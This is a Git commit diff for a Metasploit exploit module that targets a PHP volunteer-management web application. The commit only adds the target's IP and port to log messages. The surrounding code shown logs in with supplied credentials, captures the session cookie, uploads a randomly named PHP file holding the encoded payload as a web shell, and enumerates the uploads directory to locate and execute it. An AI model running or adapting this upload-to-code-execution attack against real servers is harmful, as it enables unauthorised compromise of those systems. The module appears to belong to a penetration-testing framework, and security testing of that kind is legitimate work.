Print IP/Port for each message
sinn3r
parent
43dffbe996
commit
59ea8c9ab9
|
|
@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# If we don't get a cookie, bail!
|
||||
if res and res.headers['Set-Cookie'] =~ /(PHPVolunteerManagent=\w+);*/
|
||||
cookie = $1
|
||||
vprint_status("Found cookie: #{cookie}")
|
||||
vprint_status("#{@peer} - Found cookie: #{cookie}")
|
||||
else
|
||||
return nil
|
||||
end
|
||||
|
|
@ -190,54 +190,56 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
base = target_uri.path
|
||||
base << '/' if base[-1, 1] != '/'
|
||||
|
||||
@peer = "#{rhost}:#{rport}"
|
||||
|
||||
# Login
|
||||
username = datastore['USERNAME']
|
||||
password = datastore['PASSWORD']
|
||||
cookie = login(base, username, password)
|
||||
if cookie.nil?
|
||||
print_error("Login failed with \"#{username}:#{password}\"")
|
||||
print_error("#{@peer} - Login failed with \"#{username}:#{password}\"")
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Login successful with #{username}:#{password}")
|
||||
print_status("#{@peer} - Login successful with #{username}:#{password}")
|
||||
|
||||
# Take a snapshot of the uploads directory
|
||||
# Viewing this doesn't actually require the user to login first,
|
||||
# but we supply the cookie anyway to act more like a real user.
|
||||
print_status("Enumerating all the uploads...")
|
||||
print_status("#{@peer} - Enumerating all the uploads...")
|
||||
before = peek_uploads(base, cookie)
|
||||
if before.nil?
|
||||
print_error("Unable to enumerate original uploads")
|
||||
print_error("#{@peer} - Unable to enumerate original uploads")
|
||||
return
|
||||
end
|
||||
|
||||
# Upload our PHP shell
|
||||
print_status("Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
|
||||
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
|
||||
fname = rand_text_alpha(rand(10)+6) + '.php'
|
||||
desc = rand_text_alpha(rand(10)+5)
|
||||
php = %Q|<?php #{payload.encoded} ?>|
|
||||
res = upload(base, cookie, fname, php, desc)
|
||||
if res.nil? or res.body !~ /The file was successfuly uploaded/
|
||||
print_error("Failed to upload our file")
|
||||
print_error("#{@peer} - Failed to upload our file")
|
||||
return
|
||||
end
|
||||
|
||||
# Now that we've uploaded our shell, let's take another snapshot
|
||||
# of the uploads directory.
|
||||
print_status("Enumerating new uploads...")
|
||||
print_status("#{@peer} - Enumerating new uploads...")
|
||||
after = peek_uploads(base, cookie)
|
||||
if after.nil?
|
||||
print_error("Unable to enumerate latest uploads")
|
||||
print_error("#{@peer} - Unable to enumerate latest uploads")
|
||||
return
|
||||
end
|
||||
|
||||
# Find the filename of our uploaded shell
|
||||
files = get_my_file(before.body, after.body)
|
||||
if files.empty?
|
||||
print_error("No new file(s) found. The upload probably failed.")
|
||||
print_error("#{@peer} - No new file(s) found. The upload probably failed.")
|
||||
return
|
||||
else
|
||||
vprint_status("Found these new files: #{files.inspect}")
|
||||
vprint_status("#{@peer} - Found these new files: #{files.inspect}")
|
||||
end
|
||||
|
||||
# There might be more than 1 new file, at least execute the first 10
|
||||
|
|
|
|||
Loading…
Reference in New Issue